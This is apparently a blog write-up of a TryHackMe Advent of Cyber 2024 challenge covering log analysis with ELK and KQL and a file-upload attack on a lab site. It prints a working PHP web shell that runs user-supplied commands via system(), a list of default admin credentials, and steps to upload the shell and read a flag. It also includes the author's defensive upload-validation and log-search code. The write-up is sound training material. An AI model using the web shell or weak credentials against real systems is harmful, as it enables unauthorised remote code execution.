TryHackMe - Advent of Cyber 2024 Day 3


Happy December 3rd, another new day means another new challenge in the Advent of Cyber 2024 event by TryHackMe. If you’re not caught up yet or you want to know more about the event, check out my Day 1 article. No answers will be posted in these articles, as per the rules of Advent of Cyber, but I explain my process of finding them without actually showing the answer. Again, to go along with the holiday season and this event of daily challenges, I’m going to try my best to complete the new challenge each day, and some days I might post a writeup here. This won’t be a daily thing, as each day’s challenge is pretty long and I am fast approaching finals week, but I’ll post here when possible.


Day 3: Even if I wanted to go, their vulnerabilities wouldn't allow it.

The learning objectives for today’s challenge include:

  • Learn about Log analysis and tools like ELK

  • Learn about KQL (Kibana Query Language), and how to use it when using ELK

  • Learn about RCE (Remote Code Execution), and how this can be done via unsafe/unrestricted file uploads

In today’s challenge we’re continuing the log analysis theme from yesterday and continuing to use Elastic. Today the room really explains each section of the application and its purpose. Today’s challenge mixes red and blue aspects along with the practical and question sections of the challenge. Following or reading along with the task on TryHackMe is very useful, especially if you wanted a bit more of an explanation of yesterday’s challenge.

Operation Blue

It goes through the explanation of ELK, showing how to change the collection of logs and the timeframe, and explaining each section of the Discover page (the search bar, index pattern, fields, timeline, documents (logs) and the time filter) as well as where they are on the site. It also explains KQL, how it’s used, and its query syntax, which is also shown and discussed in the table below.

Query/Syntax | Description | Example
--- | --- | ---
“ “ | search specific values, used for exact searches | “TryHackMe”
* | denotes a wildcard, searches similar matches to the value provided | United * (would return United Kingdom and United States)
OR | search logs containing either of the values provided | “United Kingdom” OR “England”
AND | search logs containing both of the values provided | “Ben” AND “25”
: | used to search the specified field of a document | ip.address:10.10.10.10

Operation Red

This section focuses on the attack and exploiting file upload vulnerabilities. It explains the dangers of unrestricted file uploads and the usage of weak credentials. Some common examples are shown in the table below.

Username | Password
--- | ---
admin | admin
administrator | administrator
admin@domainname | admin
guest | guest

It walks through RCEs, web shells, and how to exploit an RCE through file upload, and provides some code and other examples. The code here is an example of a PHP file that could be used to exploit this vulnerability, provided by THM.

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['command'])) 
    {
        system($_GET['command'] . ' 2>&1'); 
    }
?>
</pre>
</body>
</html>
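
As the defensive counterpart to the web shell above, here is an added Python example (my own, not from THM or the room) of the validation an upload handler should perform before a user-supplied file ever reaches the web root: ignore any client-supplied path, allow only a short list of image extensions, check that the bytes really start with that image type’s magic number, and store the file under a server-chosen random name. The allowlist, regex and helper names are my own choices.

```python
import os
import re
import secrets

# Allowed extensions with the magic bytes a genuine file of that type starts with.
ALLOWED = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff"}
# One stem, one dot, one short extension: rules out shell.php.jpg style double extensions.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,5}$")


def validate_upload(filename, data):
    """Return (accepted, reason) for a client-supplied name and file contents."""
    name = os.path.basename(filename)
    if name != filename or not SAFE_NAME.match(name):
        return False, "bad filename"              # traversal, odd characters, double extension
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        return False, "extension not allowed"     # .php, .phtml, .phar ... never reach the web root
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension"   # PHP source renamed to .jpg
    return True, "ok"


def stored_name(filename):
    """Server-chosen name: random stem plus the validated extension, never the client's name."""
    ext = os.path.basename(filename).rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


def handle_upload(filename, data):
    """Validate, then return the name the file would be saved under (None if rejected)."""
    ok, _reason = validate_upload(filename, data)
    return stored_name(filename) if ok else None
```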

Before moving on to the questions, make sure you have proper access to frostypines.thm. To do that, you can either become root and enter the command echo "[MACHINE IP] frostypines.thm" >> /etc/hosts in your terminal (remember to substitute the machine’s IP), or you can find the file and write to it directly.

Questions

BLUE Question 1: Where was the web shell uploaded to? Answer format: /directory/directory/directory/filename.php

Searching for “shell.php” in the search bar using KQL, and enabling the message field in the log details, revealed some paths to focus my attention on for this question. There are a few different ones, so make sure they fit the answer format, and use the hint for some extra help if you need it.

BLUE Question 2: What IP address accessed the web shell?

Looking at the IP addresses linked with the logs shown using the above search filter revealed the answer. There are a couple of different IPs shown, but it will be quite obvious which one it is.
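
To tie the KQL table above to Blue Questions 1 and 2, here is an added Python example (my own, not TryHackMe’s code or data) that evaluates a small KQL-like subset (quoted phrases, * wildcards, field:value, AND, OR) over a handful of constructed web-server events, and uses it to pull out the web shell’s path and the client IPs that hit it. The documents, field names, paths and IPs are all made up for the example, and adjacent terms are treated as AND, which is a simplification of real KQL.

```python
import shlex
from fnmatch import fnmatchcase

# Constructed sample events (not real THM data); field names are assumptions.
DOCS = [
    {"ip": "10.0.0.5", "method": "POST", "path": "/webroot/example/upload.php", "status": 200,
     "message": "POST /webroot/example/upload.php file=shell.php"},
    {"ip": "10.0.0.5", "method": "GET", "path": "/webroot/example/uploads/shell.php", "status": 200,
     "message": "GET /webroot/example/uploads/shell.php?command=id"},
    {"ip": "192.168.1.20", "method": "GET", "path": "/index.php", "status": 200,
     "message": "GET /index.php"},
    {"ip": "192.168.1.20", "method": "GET", "path": "/webroot/example/uploads/holiday.jpg",
     "status": 200, "message": "GET /webroot/example/uploads/holiday.jpg"},
    {"ip": "10.0.0.5", "method": "GET", "path": "/login.php", "status": 401,
     "message": "GET /login.php"},
]


def _term_matches(term, doc):
    """One term: field:value (exact, or fnmatch when it has *) or free text (substring)."""
    if ":" in term:
        field, pattern = term.split(":", 1)
        value = str(doc.get(field, ""))
        return fnmatchcase(value, pattern) if "*" in pattern else value == pattern
    return any(term.lower() in str(v).lower() for v in doc.values())


def kql_match(query, doc):
    """OR binds looser than AND, as in KQL; adjacent terms are AND-ed (simplification).
    shlex handles the quotes, so "United Kingdom" stays a single term."""
    groups, current = [], []
    for tok in shlex.split(query):
        if tok.upper() == "OR":
            groups.append(current)
            current = []
        elif tok.upper() != "AND":
            current.append(tok)
    groups.append(current)
    return any(g and all(_term_matches(t, doc) for t in g) for g in groups)


def search(query, docs=DOCS):
    return [d for d in docs if kql_match(query, d)]


def webshell_paths(docs=DOCS):
    # Blue Q1 style: where does a file called shell.php live?
    return sorted({d["path"] for d in search("path:*shell.php", docs)})


def webshell_client_ips(docs=DOCS):
    # Blue Q2 style: which clients requested the shell after it was uploaded?
    return sorted({d["ip"] for d in search("path:*shell.php AND method:GET", docs)})
```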

RED Question 3: What is the contents of flag.txt?

Using other things mentioned in this room earlier, such as weak credentials, RCE, and the common shell.php code, will help you find the required file. Bypassing the login page for the frostypines site will give you access to a file upload; use that to upload your shell code. Once you have done that, navigate to the directory you found earlier. If you did the previous steps successfully, you should see the web shell’s command form when you navigate to that directory. Enter the necessary commands to find the flag.

Question 4: If you liked today's task, you can learn how to harness the power of advanced ELK queries.


Conclusion

The continuation of log analysis from yesterday, along with the new inclusion of some red tasks and a website to explore, was great. There was a lot of explanation prior to the questions, but the questions themselves included very little detail, which worked well for putting newly learnt info and skills to the test. A bit more challenging than yesterday, but still pretty easy for beginners or less advanced users to pick up, and a lot of fun. Looking forward to tomorrow!